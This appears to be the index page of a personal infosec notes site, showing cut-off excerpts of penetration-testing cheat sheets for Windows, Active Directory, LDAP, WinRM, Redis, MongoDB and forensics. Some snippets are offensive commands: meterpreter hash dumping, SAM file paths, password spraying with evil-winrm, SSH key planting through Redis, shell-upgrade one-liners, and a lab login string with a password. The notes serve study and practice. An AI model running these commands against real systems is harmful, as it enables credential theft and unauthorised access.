GZ If the file cannot be extracted gzip: log.gz: unexpected end of file use zcat index.gz
Vulnerability scanner: https://github.com/steverobbins/magescan
Show tables .tables Show columns / schema from a table PRAGMA table_info(users)
General commands Show available Docker images docker images Show running Docker instances docker ps Run an instance in foreground (debug logs are visible) docker run -p 8080:80/tcp --name bolt11 aerth/boltcms:latest Run an instance in the background docker run -p 8000 --name <name> -d -t <imagename> Open shell into an instance docker exec -it <container_name> /bin/bash…
Fingerprintjs2 collects a vast amount of browser configurations. Victims could be brought to visit a site which contains this JS which sends the information back to the attacker. See OSCP 414ff
The Windows registry is a central data storage for the operation system as well as for applications. It’s a key-value storage in a tree structure. A hive is a set of keys and their values. The root hives are: Short Long Content Source file HKCR HKEY_CLASSES_ROOT Information about file types and properties HKCC HKEY_CURRRENT_CONFIG Information about…
Checklist A domain of a DC consists out of the following elements: An object in AD may have a set of ACE Access Control Entries which is called ACL Access Control List. An object’s ACE can be retrieved in PS with Get-ObjectAcl [-Identity| $object. The SCM Service Control Manager contains a database of installed services…
ext3/ext4 Design principles: Information about the file system General information fsstat /dev/sda1 Information of an inode (2 = root directory): istat /dev/sda1 2 Get the partitions of an image mmls server.img mmls shows the start offset of each partition. Show details of the partition which starts at 4096: fsstat -o 4096 server.img Show all files of a…
Windows clients use SAM files. Windows DC uses ntds.dit to store all hashes from the domain. SAM C:\windows\repair\sam C:\windows\System32\config\SAM C:\windows\System32\config\RegBack\SAM Alternatives in meterpreter: run post/windows/gather/hashdump run post/windows/gather/smart_hashdump run hashdump hashdump (load module before: use priv) creds_all If hashdump doesn’t work: Notes Format Username : UID : LM hash : NTLM hash : : : For hashcat,…
It is possible to write as a user arbitrary text into the logs. Messages can be faked which could alert persons/surveillance systems. https://turbochaos.blogspot.com/2014/08/journalctl-terminal-escape-injection.html?view=classic
Ports: ldap 389/tcp ldaps 636/tcp globalldap/globalcatldap 3268/tcp globalldaps/globalcatldapssl 3269/tcp Enumerate without credentials Nmap enumeration scans nmap -n -sV --script "ldap* and not brute" $target Ldapsearch scan ldapsearch -x -h $target -D '' -w '' -b "DC=BLA,DC=local" Connect to LDAPs/GlobalLDAPs: openssl s_client -connect $target:636 </dev/null openssl s_client -connect $target:3269 </dev/null Search in the directory: ldapsearch -x -b…
Create a session tmux new -s <name>
Powershell Cmdlets consist out of Verb-Method. To search for a method, type Get-Command New-U* To see all attributes for a Cmdlet, type Get-LocalUser | Get-Member To see specific or non-default attributes, type Get-LocalUser | Select-Object -Property Name,PasswordRequired Examples Directories and files Get all files in the current directory. Get-ChildItem Get all files in the current directory and below.…
Windows Remote Management (WinRM / wsman) is a service which runs on port 5985 and 5986. Evil Winrm Github | Opens a shell for a user root@kali:~# evil-winrm -i $victim -u melanie -p 'Welcome123!' For many users: for cred in $(cat user_pass.txt); do username=$(echo $cred | cut -d ',' -f 1) password=$(echo $cred | cut -d ',' -f…
Basics Authentication sequence for an user to log in on a domain (controller): Authentication sequence for an authenticated user on a local system: Terminology Kerberoasting means an offline cracking of the password in the NTLM hash. Useless if the service runs as service user. Then, the password will be replaced by a 128 character long…
Runs on port 6379 — needs a full nmap scan! If conection is possible via telnet, useful commands are: info CONFIG GET * all keys: keys * It is possible to determine which directories exist: config set dir /var/www/htdocs -ERR Changing directory: No such file or directory set dir /var/www +OK set dir /var/www/html +OK Upload SSH key via redis…
Convert a Python2 script into a Python3 script: 2to3 -w example.py Fix tab/space/identation problems: autopep8 -i linuxprivchecker.py If a library is installed, but cannot found from smb.SMBConnection import SMBConnection then try to search the file locally and include the path manually: import syssys.path.append("path/to/your/file") Oneliner for executing bash in a file: echo 'import os;os.system("/bin/bash")' > /tmp/e.py Execute something:…
Connect from the command line mongo 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace' Show databases show dbs Switch to database use <db> Show all collections (“tables”) show collections Show all entries from a collection db.<collection>.find() Add a document db.products.insert( { item: "card", qty: 15 } ) Injections Show all records of the current table, assuming there is a WHERE clause for one field.…
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';